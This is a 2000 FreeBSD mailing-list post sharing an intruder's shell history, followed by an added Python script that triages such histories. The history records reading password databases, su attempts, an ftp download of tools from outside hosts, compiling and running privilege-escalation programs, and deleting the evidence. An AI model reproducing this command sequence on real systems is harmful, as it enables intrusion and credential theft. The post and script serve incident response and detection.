Date: Mon, 18 Dec 2000 15:06:32 -0500
From: "Gerald T. Freymann" <freymann@eagle.ca>
To: "Questions" <questions@FreeBSD.ORG>
Subject: Hacker history file - OUCH
Message-ID: <NEBBIPHLEDGOAFACJGDDAEBPDHAA.freymann@eagle.ca>
Seems we have an intruder on one of our boxes... the .history file from the troubled account follows:

cd bnc
ls ./bash
who
cd /etc
more passwd
ps -l
ls -l
more pwd.db
more hosts
pico adduser.conf.bak
pico group
su user
pico group.bak
pico ftpuser O
pico ftpusers
su toor
su operator
id
pico spwd.db
su wheel
pico passwd
cd /var/tmp
ls -a
cd ...
ls -a
cd ..
ls -l
ls -al
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
ls
who
cd /var/tmp
ls -a
ls -al
cd ...
ls -a
ftp cih.edu.mx
ls
cc bsd1 bsd-cron.c
cc -o bsd1 bsd-cron.c
./bsd1
id
cc -o bsd2 bsd2.c
./bsd2
id
ls
ftp cih.edu.mx
./bsd
sh ./bsd.sh
chmod u+x bsd.sh
./bsd.sh /tmp/sh
id
ls
cc -o bsdsmail bsdsmail.c
./bsdsmail
ls -a
pico hack
ls
pico user.inf
ls
id
rm *
exit

Anybody recognize what the intruder has set up?

-Gerry

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
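A triage pass over a shell history like the one in the message above, as an added example that is not part of the original post: it follows `cd` to track the working directory and tags lines an incident responder would review first. The tag names, the file and program lists, and the `triage` function are assumptions chosen for illustration.

```python
import posixpath
import re

# Selected commands from the history quoted in the message, one per line
# (the line breaks are an assumption; the archive shows them run together).
SAMPLE = """cd /etc
more passwd
su toor
cd /var/tmp
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
rm *""".splitlines()

ACCOUNT_FILES = {"passwd", "master.passwd", "pwd.db", "spwd.db", "group", "ftpusers"}
VIEWERS = {"more", "less", "cat", "pico", "vi", "ee"}
TEMP_DIRS = ("/tmp/", "/var/tmp/")
SIMPLE = {"su": "priv-switch", "ftp": "download", "fetch": "download", "cc": "compile", "gcc": "compile"}

def triage(lines, home="~"):
    """Return (line_no, tag, command) for each history line worth a look."""
    cwd, findings = home, []
    for no, raw in enumerate(lines, 1):
        argv = raw.split()
        if not argv:
            continue
        prog, args = argv[0], argv[1:]
        if prog in ("sh", "bash") and args:   # "sh ./x.sh" runs ./x.sh
            prog = args[0]
        tag = SIMPLE.get(prog)
        if prog == "cd":                      # follow cwd to know where things ran
            cwd = posixpath.normpath(posixpath.join(cwd, args[0])) if args else home
            if re.fullmatch(r"\.{3,}", posixpath.basename(cwd)):
                tag = "hidden-dir"            # dot-only name that blends in with . and ..
        elif prog in VIEWERS and any(posixpath.basename(a) in ACCOUNT_FILES for a in args):
            tag = "account-file"
        elif prog.startswith("./") or prog.startswith(TEMP_DIRS):
            where = prog if prog.startswith("/") else cwd + "/"
            tag = "exec-in-tmp" if where.startswith(TEMP_DIRS) else "exec-local"
        elif prog == "rm" and "*" in args:
            tag = "cleanup"
        if tag:
            findings.append((no, tag, raw.strip()))
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(*finding, sep="\t")
```

A history file is attacker-writable, so the output is a lead for review alongside file timestamps and system logs, not a complete record.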